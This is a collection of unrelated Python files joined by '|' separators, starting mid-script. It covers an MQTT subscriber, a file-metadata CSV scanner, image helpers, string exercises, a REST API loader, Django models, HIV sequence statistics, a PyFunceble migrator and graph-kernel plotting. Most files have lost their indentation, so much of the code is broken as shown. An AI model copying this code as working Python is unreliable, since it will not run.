g.add((new_obs, SOSA.resultTime, Literal(dt, datatype=XSD.dateTime)))
on_message.id = 1
print("creating new instance")
client = mqtt.Client("OUOFZOBFOUZFB") # create new instance (the ID, in this case "P1", must be unique)
#broker_address = "localhost" # Use your own MQTT Server IP Adress (or domain name) here, or ...
broker_address = "test.mosquitto.org" # ... use the Mosquitto test server during development
client.username_pw_set("admin", "password")
client.connect(broker_address) # connect to broker
client.subscribe("teds20/group10/pressure", qos=2) # subscribe
time.sleep(2)
try:
print("connecting to broker")
client.loop_start() # start the event processing loop
for i in range(10):
client.on_message = on_message # attach "on_message" callback function (event handler) to "on_message" event
        time.sleep(1) # poll for incoming messages once per second
time.sleep(4) # wait 4 seconds before stopping the event processing loop (so all pending events are processed)
client.loop_stop() # stop the event processing loop
client.unsubscribe("teds20/group10/pressure") # unsubscribe
print("\ndisconnecting from broker\n")
client.disconnect() # disconnect from broker
except Exception as e:
# if we receive an exception (error) in the "try" block,
# handle it here, by printing out the error message
print(f"connection error: {e}")
print_graph(g)
with open("publisher.ttl", "w") as f:
f.write(g.serialize(format='ttl', base=BASE).decode('u8'))
|
from __future__ import print_function
import os
import sys
import stat
from datetime import datetime
import math
import csv
import argparse
fieldnames = [
# CUSTOM
"File_Name", "Type", "Full_Path",
"Date_Modified", "Date_Created", "Date_Accessed",
"DateTime_Modified", "DateTime_Created", "DateTime_Accessed",
"Size",
# ATTRIBUTES
"st_size", "st_mode", "st_ino", "st_dev", "st_nlink",
"st_uid", "st_gid",
# TIMESTAMPS
"st_atime", "st_mtime", "st_ctime",
"st_atime_ns", "st_mtime_ns", "st_ctime_ns",
# ATTRIBUTES ON MISC SYSTEMS
"st_blocks", "st_blksize", "st_rdev", "st_flags",
"st_gen", "st_birthtime", "st_fstype", "st_ftype",
"st_attrs", "st_obtype", "st_rsize", "st_creator",
"st_type", "st_file_attributes"
]
def walktree(top, callback):
# From Python documentation
'''recursively descend the directory tree rooted at top,
calling the callback function for each regular file'''
for f in os.listdir(top):
pathname = os.path.join(top, f)
current_stat = os.stat(pathname)
mode = current_stat.st_mode
if stat.S_ISDIR(mode):
# It's a directory, recurse into it
walktree(pathname, callback)
elif stat.S_ISREG(mode):
# It's a file, call the callback function
callback(pathname, current_stat)
else:
# Unknown file type, print a message
print('Skipping {}'.format(pathname))
def stat_to_dictionary(stat_obj):
result = dict((field, getattr(stat_obj, field, None))
for field in fieldnames)
return result
def h_datetime(timestamp):
return datetime.utcfromtimestamp(timestamp).strftime(
'%Y-%m-%d|%H:%M:%S'
).split("|")
def get_human_size(stat_obj):
size_bytes = stat_obj.st_size
# From https://stackoverflow.com/questions/5194057/better-way-to-convert-file-sizes-in-python
if size_bytes == 0:
return "0B"
size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size_bytes, 1024)))
p = math.pow(1024, i)
s = round(size_bytes / p, 2)
result = "{size}{unit}".format(size=s, unit=size_name[i])
return result
def get_type(mode):
if stat.S_ISREG(mode):
return "file"
if stat.S_ISDIR(mode):
return "directory"
else:
return "unknown"
def get_stat_dict(file_path, stat_obj):
stat_dict = stat_to_dictionary(stat_obj)
stat_dict["File_Name"] = os.path.basename(file_path)
stat_dict["Full_Path"] = os.path.abspath(file_path)
stat_dict["Date_Modified"] = h_datetime(stat_obj.st_mtime)[0]
stat_dict["Date_Accessed"] = h_datetime(stat_obj.st_atime)[0]
stat_dict["Date_Created"] = h_datetime(stat_obj.st_ctime)[0]
stat_dict["DateTime_Modified"] = (" ").join(
h_datetime(stat_obj.st_mtime)[0:2])
stat_dict["DateTime_Accessed"] = (" ").join(
h_datetime(stat_obj.st_atime)[0:2])
stat_dict["DateTime_Created"] = (" ").join(
h_datetime(stat_obj.st_ctime)[0:2])
stat_dict["Size"] = get_human_size(stat_obj)
stat_dict["Type"] = get_type(stat_obj.st_mode)
return stat_dict
def process_file_metadata_with(effect):
def process_file_metadata(file_path, stat_obj):
stat_dict = get_stat_dict(file_path, stat_obj)
effect(stat_dict)
print("Read {}".format(file_path))
return process_file_metadata
def scan_folder(append=False, folders=["."], output="Files.csv"):
if append is False:
if os.path.exists(output):
os.remove(output)
csvFile = open(output, 'a')
writer = csv.DictWriter(csvFile, restval="", delimiter=',',
extrasaction='ignore', fieldnames=fieldnames)
if append is False:
writer.writeheader()
for folder in folders:
walktree(folder, process_file_metadata_with(writer.writerow))
csvFile.close()
def parse_arguments():
parser = argparse.ArgumentParser(
description='Creates csv record of files in one or more folders.')
parser.add_argument("folders", nargs='+', help='Base folder')
parser.add_argument(
"-o", "--output", help="output filename", default="Files.csv")
parser.add_argument("-a", "--append", action='store_true',
help='Append to output file', default=False)
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_arguments()
scan_folder(append=args.append, folders=args.folders, output=args.output)
|
##########################################################################################
# Utility functions for images
##########################################################################################
import os
import cv2
import glob
import numpy as np
from PIL import Image
from matplotlib.image import imread
def load_image(path, size=None):
"""
Load the image from the given file-path and resize it to the given size if not None.
Eg: size = (width, height)
"""
img = Image.open(path)
    if size is not None and size != '':
img = img.resize(size=size, resample=Image.LANCZOS)
img = np.array(img)
# Scale image-pixels so they fall between 0.0 and 1.0
# img = img / 255.0
# Convert 2-dim gray-scale array to 3-dim RGB array.
if (len(img.shape) == 2):
img = np.repeat(img[:, :, np.newaxis], 3, axis=2)
return np.array(img)
def load_images(image_paths):
# Load the images from disk.
images = [imread(path) for path in image_paths]
# Convert to a numpy array and return it.
return np.asarray(images)
def load_images_v2(image_paths_list):
images = []
for image_path in image_paths_list:
image = Image.open(image_path)
image = np.array(image, dtype=np.float32)
images.append(image)
images = np.array(images)
# images = np.array([np.array(Image.open(image_path), dtype=np.float32) for image_path in image_paths_list])
return images
def get_images_path_list_from_dir(dir_path, img_format='jpg'):
img_regex = os.path.join(dir_path, '*.' + img_format)
img_paths = glob.glob(img_regex)
# imgs = [load_image(img_path) for img_path in img_paths]
# return np.array(imgs), img_paths
return img_paths
def save_image(image_np, image_path_name):
img = Image.fromarray(image_np)
img.save(image_path_name)
def color_constancy(img, power=6, gamma=None):
"""
Parameters
----------
img: 2D numpy array
The original image with format of (h, w, c)
power: int
The degree of norm, 6 is used in reference paper
gamma: float
The value of gamma correction, 2.2 is used in reference paper
"""
## img = cv2.imread(img_name)
# img = np.array(Image.open(img_name))
img = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)
img_dtype = img.dtype
if gamma is not None:
img = img.astype('uint8')
look_up_table = np.ones((256,1), dtype='uint8') * 0
for i in range(256):
look_up_table[i][0] = 255*pow(i/255, 1/gamma)
img = cv2.LUT(img, look_up_table)
img = img.astype('float32')
img_power = np.power(img, power)
rgb_vec = np.power(np.mean(img_power, (0,1)), 1/power)
rgb_norm = np.sqrt(np.sum(np.power(rgb_vec, 2.0)))
rgb_vec = rgb_vec/rgb_norm
rgb_vec = 1/(rgb_vec*np.sqrt(3))
img = np.multiply(img, rgb_vec)
img = cv2.cvtColor(np.array(img), cv2.COLOR_BGR2RGB)
# img_name_mod = img_name.split('.')[0] + '_ilu.' + img_name.split('.')[1]
# img_save = Image.fromarray(img.astype('uint8'))
# img_save.save(img_name_mod)
## cv2.imwrite(img_name_mod, np.array(img_save))
# return img
return img.astype(img_dtype)
|
# Determine if a string has all unique characters.
def is_unique(s):
for x in range(0, len(s)):
for y in range(x+1,len(s)):
if s[x]==s[y]:
return False
return True
# Should have used new array with simple 128 hash function and check for less than 128 size string
# That would have O(n) runtime (or O(1) because largest loop is 128 long)
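# Example: is_unique2("abcdefg") -> True, is_unique2("hello") -> False (repeated 'l').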
def is_unique2(s):
if len(s)>128:
return False
charset=[False]*128
for letter in s:
key=ord(letter)
if charset[key]:
return False
charset[key]=True
return True
# Check if one string is a permutation of the other
def is_permutation(string_one, string_two):
if (len(string_one)!=len(string_two)):
return False
char_set = [0]*128
for letter in string_one:
char_set[ord(letter)]+=1
for letter in string_two:
char_set[ord(letter)]-=1
if char_set[ord(letter)] < 0:
return False
return True
import unittest
class TestStringsQuestions(unittest.TestCase):
def test_is_permutation(self):
self.assertTrue(is_permutation("i","i"))
self.assertFalse(is_permutation("hi","i"))
def test_is_unique(self):
self.assertTrue(is_unique('asdfghjk'))
self.assertFalse(is_unique('ff'))
def test_is_unique2(self):
self.assertTrue(is_unique2('asdfghjk'))
self.assertFalse(is_unique2('ff'))
if __name__ == '__main__':
unittest.main()
|
"""Treadmill REST APIs"""
import logging
import importlib
import pkgutil
import flask
# E0611: Used when a name cannot be found in a module.
# F0401: Used when PyLint has been unable to import a module.
#
# pylint: disable=E0611,F0401
import flask_restplus as restplus
from treadmill import authz
from treadmill.rest import error_handlers
from treadmill import rest
from treadmill import utils # noqa: F401
from treadmill import webutils
__path__ = pkgutil.extend_path(__path__, __name__)
_LOGGER = logging.getLogger(__name__)
def init(apis, title=None, cors_origin=None, authz_arg=None):
"""Module initialization."""
blueprint = flask.Blueprint('v1', __name__)
api = restplus.Api(blueprint, version='1.0',
title=title,
description="Treadmill REST API Documentation")
error_handlers.register(api)
# load up any external error_handlers
try:
err_handlers_plugin = importlib.import_module(
'treadmill.plugins.rest.error_handlers')
err_handlers_plugin.init(api)
except ImportError as err:
        _LOGGER.warning('Unable to load error_handlers plugin: %s', err)
@blueprint.route('/docs/', endpoint='docs')
def _swagger_ui():
"""Swagger documentation route"""
return restplus.apidoc.ui_for(api)
rest.FLASK_APP.register_blueprint(blueprint)
rest.FLASK_APP.register_blueprint(restplus.apidoc.apidoc)
cors = webutils.cors(origin=cors_origin,
content_type='application/json',
credentials=True)
@rest.FLASK_APP.after_request
def _after_request_cors_handler(response):
"""Process all OPTIONS request, thus don't need to add to each app"""
if flask.request.method != 'OPTIONS':
return response
_LOGGER.debug('This is an OPTIONS call')
def _noop_options():
"""No noop response handler for all OPTIONS"""
pass
headers = flask.request.headers.get('Access-Control-Request-Headers')
options_cors = webutils.cors(origin=cors_origin,
credentials=True,
headers=headers)
response = options_cors(_noop_options)()
return response
def user_clbk():
"""Get current user from the request."""
return flask.request.environ.get('REMOTE_USER')
if authz_arg is None:
authorizer = authz.NullAuthorizer()
else:
authorizer = authz.ClientAuthorizer(user_clbk, authz_arg)
endpoints = []
for apiname in apis:
try:
apimod = apiname.replace('-', '_')
_LOGGER.info('Loading api: %s', apimod)
api_restmod = importlib.import_module(
'.'.join(['treadmill', 'rest', 'api', apimod])
)
api_implmod = importlib.import_module(
'.'.join(['treadmill', 'api', apimod])
)
api_impl = api_implmod.init(authorizer)
endpoint = api_restmod.init(api, cors, api_impl)
if endpoint is None:
endpoint = apiname.replace('_', '-').replace('.', '/')
if not endpoint.startswith('/'):
endpoint = '/' + endpoint
endpoints.append(endpoint)
except ImportError as err:
            _LOGGER.warning('Unable to load %s api: %s', apimod, err)
return endpoints
|
class Person:
    '''Person class.
    Receives the first name and last name as parameters.'''
def __init__(self, fname, lname):
self.firstname = fname
self.lastname = lname
def printname(self):
print(self.firstname, self.lastname)
class Student(Person):
def __init__(self, fname, lname, clave):
super().__init__(fname , lname)
self.__carrera = 'medicina'
self.__clave = clave
def getClave(self):
return self.__clave
def setClave(esta, clave):
esta.__clave = clave
def getCarrera(self):
return self.__carrera
def setCarrera(esta, carrera):
        esta.__carrera = carrera
def printname(self):
super().printname()
print("Soy estudiante")
Cristian = Person('Cristian', 'Flores')
Cristian.printname()
print()
Pedro = Student('Pedro', 'Jimenez', 200977)
Pedro.printname()
print('Mi clave es:', Pedro.getClave())
print('Mi carrera es:', Pedro.getCarrera())
print()
Raquel = Student('Raquel', 'Garcia', 200896)
Raquel.printname()
Raquel.setClave(200896)
print('Mi clave es:', Raquel.getClave())
Raquel.setCarrera('Enfermera')
print('Mi carrera es:', Raquel.getCarrera())
|
from django.db import models
from django.contrib.auth.models import User
from tinymce.models import HTMLField
# Create your models here.
class Profile(models.Model):
profile_image = models.ImageField(upload_to = 'pictures/')
bio= models.CharField(max_length=30)
user= models.OneToOneField(User,on_delete=models.CASCADE)
username= models.CharField(max_length=32)
location = models.CharField(max_length=32)
neighbourhood = models.CharField(max_length=32,null= True)
def save_profile(self):
self.save()
def delete_neighbourhood(self):
self.delete()
class post(models.Model):
name= models.CharField(max_length=30)
    user = models.ForeignKey(User, on_delete=models.CASCADE)
post = HTMLField()
image_path = models.ImageField(upload_to = 'pictures/')
def __str__(self):
return self.name
def save_post(self):
self.save()
class NeighbourHood(models.Model):
image_path = models.ImageField(upload_to = 'pictures/')
name = models.CharField(max_length=30)
location= models.CharField(max_length=32)
count = models.IntegerField(default=0)
def __str__(self):
return self.name
def save_neighbourhood(self):
self.save()
def delete_neighbourhood(self):
self.delete()
class Business(models.Model):
owner = models.CharField(max_length=30)
business_name= models.CharField(max_length=32)
business_email =models.EmailField(max_length=300)
description= models.TextField(max_length=300)
location = models.ForeignKey(NeighbourHood,on_delete=models.CASCADE)
user = models.ForeignKey(User,on_delete=models.CASCADE)
def create_business(self):
self.save()
def delete_business(self):
self.delete()
def __str__(self):
        return self.business_name
|
import pytest
from .solution import solve, solve2
INPUT = """
"""
def test_solve():
assert solve(4, 8) == 739785
def test_solve2():
assert solve2(4, 8) == 444356092776315
|
# vim: fdm=marker
'''
author: Fabio Zanini/Richard Neher
date: 25/04/2015
content: Data access module for HIV patients.
'''
# Modules
import numpy as np
from .sequence import alpha, alphaa
def diversity(af):
return np.mean(af.sum(axis=0)) - np.mean(np.sum(af**2, axis=0))
def divergence(af, initial):
return np.mean(af.sum(axis=0)) - np.mean(af[initial,np.arange(len(initial))])
def majority_frequency(af):
return np.max(af, axis=0)
def majority_indices(af):
return np.argmax(af, axis=0)
def consensus(af):
return alpha[majority_indices(af)]
def LD(af2p, af1p, cov, cov_min = 100):
p = af1p.max(axis=0)
pi = af1p.argmax(axis=0)
q=1-p
p12 = np.ma.zeros(cov.shape, dtype = float)
ind1 = np.arange(pi.shape[0])
ind2 = np.ones(pi.shape[0], dtype=int)
for ii, nuci in enumerate(pi):
p12[ii,:] = af2p[nuci][(pi,ii*ind2,ind1)]
p12.mask = cov<cov_min
np.fill_diagonal(p12.mask, True)
p1p2 = np.outer(p,p)
p1q1p2q2 = np.outer(p*q,p*q)
p1q2 = np.outer(p,q)
D = p12 - p1p2
LD = D**2/(1e-10+p1q1p2q2)
Dp = D
Dp[Dp>0] /= np.minimum(p1q2, p1q2.T)[Dp>0]
Dp[Dp<0] /= np.minimum(p1p2, p1p2.T)[Dp<0]
Dp = np.abs(Dp)
np.fill_diagonal(LD,0)
np.fill_diagonal(Dp,0)
return LD, Dp, p12
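
# A minimal usage sketch (illustrative only, with made-up data), assuming the
# `alpha` imported from .sequence is an indexable numpy array of characters:
# build a tiny allele-frequency matrix with one row per character and one
# column per position, then compute the summary statistics defined above.
if __name__ == '__main__':
    L = 5                                   # number of positions
    af = np.random.rand(len(alpha), L)      # hypothetical allele frequencies
    af /= af.sum(axis=0)                    # each column sums to 1
    initial = majority_indices(af)          # treat the current majority as the founder
    print('diversity: ', diversity(af))
    print('divergence:', divergence(af, initial))
    print('consensus: ', consensus(af))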
|
"""
The tool to check the availability or syntax of domain, IP or URL.
::
██████╗ ██╗ ██╗███████╗██╗ ██╗███╗ ██╗ ██████╗███████╗██████╗ ██╗ ███████╗
██╔══██╗╚██╗ ██╔╝██╔════╝██║ ██║████╗ ██║██╔════╝██╔════╝██╔══██╗██║ ██╔════╝
██████╔╝ ╚████╔╝ █████╗ ██║ ██║██╔██╗ ██║██║ █████╗ ██████╔╝██║ █████╗
██╔═══╝ ╚██╔╝ ██╔══╝ ██║ ██║██║╚██╗██║██║ ██╔══╝ ██╔══██╗██║ ██╔══╝
██║ ██║ ██║ ╚██████╔╝██║ ╚████║╚██████╗███████╗██████╔╝███████╗███████╗
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝╚══════╝╚═════╝ ╚══════╝╚══════╝
Provides the migrator manager.
Author:
Nissar Chababy, @funilrys, contactTATAfunilrysTODTODcom
Special thanks:
https://pyfunceble.github.io/#/special-thanks
Contributors:
https://pyfunceble.github.io/#/contributors
Project link:
https://github.com/funilrys/PyFunceble
Project documentation:
https://pyfunceble.readthedocs.io/en/dev/
Project homepage:
https://pyfunceble.github.io/
License:
::
Copyright 2017, 2018, 2019, 2020, 2021 Nissar Chababy
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from typing import Optional
import colorama
from sqlalchemy.orm import Session
import PyFunceble.checker.utils.whois
import PyFunceble.cli.utils.stdout
import PyFunceble.cli.utils.testing
import PyFunceble.facility
import PyFunceble.factory
import PyFunceble.storage
from PyFunceble.cli.continuous_integration.base import ContinuousIntegrationBase
from PyFunceble.cli.migrators.alembic import Alembic
from PyFunceble.cli.migrators.csv_file.inactive_source_delete import (
InactiveDatasetDeleteSourceColumnMigrator,
)
from PyFunceble.cli.migrators.csv_file.whois_registrar_add import (
WhoisDatasetAddRegistrarColumnMigrator,
)
from PyFunceble.cli.migrators.file_cleanup.hashes_file import HashesFileCleanupMigrator
from PyFunceble.cli.migrators.file_cleanup.mining_file import MiningFileCleanupMigrator
from PyFunceble.cli.migrators.file_cleanup.production_config_file import (
ProductionConfigFileCleanupMigrator,
)
from PyFunceble.cli.migrators.json2csv.inactive import InactiveJSON2CSVMigrator
from PyFunceble.cli.migrators.json2csv.whois import WhoisJSON2CSVMigrator
from PyFunceble.cli.migrators.mariadb.file_and_status import FileAndStatusMigrator
from PyFunceble.cli.migrators.mariadb.whois_record_idna_subject import (
WhoisRecordIDNASubjectMigrator,
)
from PyFunceble.cli.processes.base import ProcessesManagerBase
from PyFunceble.cli.processes.workers.migrator import MigratorWorker
from PyFunceble.helpers.file import FileHelper
class MigratorProcessesManager(ProcessesManagerBase):
"""
Provides the migrator manager.
"""
WORKER_OBJ: MigratorWorker = MigratorWorker
@staticmethod
def json2csv_inactive_target(
continuous_integration: ContinuousIntegrationBase,
) -> None:
"""
Provides the target for the inactive database migrator.
"""
migrator = InactiveJSON2CSVMigrator(print_action_to_stdout=True)
migrator.continuous_integration = continuous_integration
if FileHelper(migrator.source_file).exists():
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Started migration (json2csv) of the inactive dataset."
)
migrator.start()
if migrator.done:
print(
f"\n{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
"Finished migration (json2csv) of the inactive dataset."
)
else:
print(
f"\n{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Unfinished migration (json2csv) of the inactive dataset."
)
else:
PyFunceble.facility.Logger.info(
"Stopped json2csv_inactive_target. File does not exist."
)
@staticmethod
def json2csv_whois_target(
continuous_integration: ContinuousIntegrationBase,
) -> None:
"""
Provides the target for the whois database migrator.
"""
migrator = WhoisJSON2CSVMigrator(print_action_to_stdout=True)
migrator.continuous_integration = continuous_integration
if FileHelper(migrator.source_file).exists():
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Started migration (json2csv) of the whois dataset."
)
migrator.start()
if migrator.done:
print(
f"\n{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
"Finished migration (json2csv) of the whois dataset."
)
else:
print(
f"\n{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Unfinished migration (json2csv) of the whois dataset."
)
else:
PyFunceble.facility.Logger.info(
"Stopped json2csv_whois_target. File does not exist."
)
@staticmethod
def mariadb_whois_record_idna_subject_target(
continuous_integration: ContinuousIntegrationBase,
*,
db_session: Optional[Session] = None,
) -> None:
"""
Provides the target for the whois addition of the missing
idna_subject column.
"""
migrator = WhoisRecordIDNASubjectMigrator(print_action_to_stdout=True)
migrator.continuous_integration = continuous_integration
migrator.db_session = db_session
if migrator.authorized:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Started completion of NULL idna_subject(s) into the whois dataset."
)
migrator.start()
if migrator.done:
print(
f"{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
"Finished completion of NULL idna_subject(s) into "
"the whois dataset."
)
else:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Unfinished completion of NULL idna_subject(s) into "
"the whois dataset."
)
else:
PyFunceble.facility.Logger.info(
"Stopped mariadb_whois_record_idna_subject_target. Not authorized."
)
@staticmethod
def mariadb_file_and_status_target(
continuous_integration: ContinuousIntegrationBase,
*,
db_session: Optional[Session] = None,
) -> None:
"""
Provides the target for the migration of the :code:`pyfunceble_file`
and :code:`pyfunceble_status` tables.
"""
migrator = FileAndStatusMigrator(print_action_to_stdout=True)
migrator.continuous_integration = continuous_integration
migrator.db_session = db_session
if migrator.authorized:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Started migration of the pyfunceble_file and "
"pyfunceble_status tables."
)
migrator.start()
if migrator.done:
print(
f"{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
"Finished migration of the pyfunceble_file and "
"pyfunceble_status tables."
)
else:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Unfinished migration of the pyfunceble_file and "
"pyfunceble_status tables."
)
else:
PyFunceble.facility.Logger.info(
"Stopped mariadb_file_and_status_target. Not authorized."
)
@staticmethod
def hashes_file_cleanup_target(
continuous_integration: ContinuousIntegrationBase,
) -> None:
"""
Provides the target for the cleanup of the hashes file.
"""
migrator = HashesFileCleanupMigrator(print_action_to_stdout=True)
migrator.continuous_integration = continuous_integration
if FileHelper(migrator.source_file).exists():
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
f"Started deletion of {migrator.source_file!r}."
)
migrator.start()
if migrator.done:
print(
f"{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
f"Finished deletion of {migrator.source_file!r}."
)
else:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
f"Unfinished deletion of {migrator.source_file!r}."
)
else:
PyFunceble.facility.Logger.info(
"Stopped hashes_file_cleanup_target. File does not exist."
)
@staticmethod
def production_config_file_cleanup_target(
continuous_integration: ContinuousIntegrationBase,
) -> None:
"""
Provides the target for the cleanup of the production configuration file.
"""
migrator = ProductionConfigFileCleanupMigrator(print_action_to_stdout=True)
migrator.continuous_integration = continuous_integration
if FileHelper(migrator.source_file).exists():
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
f"Started deletion of {migrator.source_file!r}."
)
migrator.start()
if migrator.done:
print(
f"{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
f"Finished deletion of {migrator.source_file!r}."
)
else:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
f"Unfinished deletion of {migrator.source_file!r}."
)
else:
PyFunceble.facility.Logger.info(
"Stopped production_config_file_cleanup_target. File does not exist."
)
@staticmethod
def mining_file_cleanup_target(
continuous_integration: ContinuousIntegrationBase,
) -> None:
"""
Provides the target for the cleanup of the mining file.
"""
migrator = MiningFileCleanupMigrator(print_action_to_stdout=True)
migrator.continuous_integration = continuous_integration
if FileHelper(migrator.source_file).exists():
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
f"Started deletion of {migrator.source_file!r}."
)
migrator.start()
if migrator.done:
print(
f"{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
f"Finished deletion of {migrator.source_file!r}."
)
else:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
f"Unfinished deletion of {migrator.source_file!r}."
)
else:
PyFunceble.facility.Logger.info(
"Stopped hashes_file_cleanup_target. File does not exist."
)
@staticmethod
def csv_file_delete_source_column_target(
continuous_integration: ContinuousIntegrationBase,
) -> None:
"""
Provides the target for the deletion of the source column.
"""
migrator = InactiveDatasetDeleteSourceColumnMigrator(
print_action_to_stdout=True
)
migrator.continuous_integration = continuous_integration
file_helper = FileHelper(migrator.source_file)
if file_helper.exists():
with file_helper.open("r", encoding="utf-8") as file_stream:
first_line = next(file_stream)
if any(x in first_line for x in migrator.TO_DELETE):
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Started deletion of the 'source' column into "
f"{migrator.source_file!r}."
)
migrator.start()
if migrator.done:
print(
f"{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
"Finished deletion of the 'source' column into "
f"{migrator.source_file!r}."
)
else:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"unfinished deletion of the 'source' column into "
f"{migrator.source_file!r}."
)
else:
PyFunceble.facility.Logger.info(
"Stopped csv_file_delete_source_column_target. File does not exist."
)
@staticmethod
def csv_file_add_registrar_column_target(
continuous_integration: ContinuousIntegrationBase,
) -> None:
"""
Provides the target for the addition of the registrar column.
"""
migrator = WhoisDatasetAddRegistrarColumnMigrator(print_action_to_stdout=True)
migrator.continuous_integration = continuous_integration
file_helper = FileHelper(migrator.source_file)
if file_helper.exists():
with file_helper.open("r", encoding="utf-8") as file_stream:
first_line = next(file_stream)
if any(x not in first_line for x in migrator.TO_ADD):
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Started addition of the 'registrar' column into "
f"{migrator.source_file!r}."
)
migrator.start()
if migrator.done:
print(
f"{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
"Finished addition of the 'registrar' column into "
f"{migrator.source_file!r}."
)
else:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"unfinished addition of the 'registrar' column into "
f"{migrator.source_file!r}."
)
else:
PyFunceble.facility.Logger.info(
"Stopped csv_file_add_registrar_column_target. File does not exist."
)
def create(self) -> "ProcessesManagerBase":
for method in dir(self):
if not method.endswith("_target"):
continue
worker = MigratorWorker(
None,
name=f"pyfunceble_{method}",
daemon=True,
continuous_integration=self.continuous_integration,
)
worker.target = getattr(self, method)
self._created_workers.append(worker)
PyFunceble.facility.Logger.info("Created worker for %r", method)
@ProcessesManagerBase.ensure_worker_obj_is_given
@ProcessesManagerBase.create_workers_if_missing
def start(self) -> "ProcessesManagerBase":
# We start the migration (as a standalone)
Alembic(self._created_workers[0].db_session).upgrade()
return super().start()
|
import os
import glob
import numpy as np
import pandas as pd
import scipy as sp
import itertools
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import networkx as nx
import seaborn as sns
from sklearn.preprocessing import normalize
from sklearn.cluster import KMeans
def normalize_gram_matrix(gram_matrix):
"""
Normalization of Gram matrix.
Parameters
----------
gram_matrix: 2D array, (n_graphs, n_graphs)
Gram matrix.
Returns
-------
norm_gram_matrix: 2D array, (n_graphs, n_graphs)
Normalized gram matrix.
"""
gram_matrix_normalized = np.zeros(gram_matrix.shape)
for i in np.arange(gram_matrix.shape[0]):
for j in np.arange(i, gram_matrix.shape[0]):
gram_matrix_normalized[i, j] = gram_matrix[i, j] / np.sqrt(gram_matrix[i, i] * gram_matrix[j, j])
norm_gram_matrix = np.triu(gram_matrix_normalized, 1) + gram_matrix_normalized.T
return norm_gram_matrix
def sort_eigvec(A):
"""
Sort of eigenvalues and eigenvectors.
Parameters
----------
A: 2D array, (n_graphs, n_graphs)
Matrix to be sorted.
Return
------
sort_d: array
Sorted eigenvalues.
sort_v: 2D array
Sorted eigenvectors.
"""
d, v = sp.linalg.eig(A)
ind = d.argsort()[::-1]
sort_d = d[ind]
sort_v = v[:, ind]
return sort_d, sort_v
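
# A small illustrative sketch (not part of the original module): build a random
# positive semi-definite Gram matrix, normalize it with normalize_gram_matrix,
# and inspect its leading spectrum with sort_eigvec.
def _demo_normalize_and_sort(n_graphs=5, seed=0):
    """Illustrative only: exercise normalize_gram_matrix and sort_eigvec."""
    rng = np.random.RandomState(seed)
    feats = rng.rand(n_graphs, 3)
    gram = feats @ feats.T                  # PSD Gram matrix of inner products
    norm_gram = normalize_gram_matrix(gram)
    d, v = sort_eigvec(norm_gram)
    return d[:3], v[:, :3]                  # leading eigenvalues / eigenvectors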
def save_metrics(d, v, outdir=None):
"""
Save plots of dominant eigenvalues and of first and second eigenvectors.
Parameters
----------
d: array
Array of eigenvalues.
v: 2D array
Array of eigenvectors.
"""
if outdir is None:
outdir = os.getcwd()
else:
if not os.path.exists(outdir):
os.mkdir(outdir)
np.savetxt(os.path.join(outdir, 'eigvalues.csv'), d, delimiter=',')
np.savetxt(os.path.join(outdir, 'eigfunctions.csv'), v, delimiter=',')
sns.set()
plt.rcParams['figure.figsize'] = [20, 10]
fig = plt.figure()
ax1 = fig.add_subplot(2, 1, 1)
sns.scatterplot(np.real(d[0:10]), np.imag(d[0:10]), color='red', ax=ax1)
plt.xlabel('Real part')
plt.ylabel('Imaginary part')
plt.title('Spectrum')
ax2 = fig.add_subplot(2, 1, 2)
labels = ['First eigenfunction', 'Second eigenfunction']
for i in range(2):
v[:, i] = v[:, i] / np.max(abs(v[:, i]))
sns.lineplot(range(v.shape[0]), v[:, i], label=labels[i], lw=1, ax=ax2)
plt.legend(loc='upper left')
plt.title('The first and the second eigenfunctions')
if outdir is not None:
fig.savefig(os.path.join(outdir, 'metrics.png'))
else:
plt.show()
def show_graph(x, ind, outdir=None, data_points=None, node_colors=None):
"""
Plot average graph.
Parameters
----------
x: 2D array, (n_graphs, n_graphs)
Average adjacency matrix.
ind: int
Index of graph state.
outdir: str
Dir to save plots.
"""
sns.set(rc={'figure.figsize': (20, 8.27)})
if data_points is not None and not isinstance(data_points, dict):
keys = np.arange(len(data_points))
values = list(map(tuple, data_points))
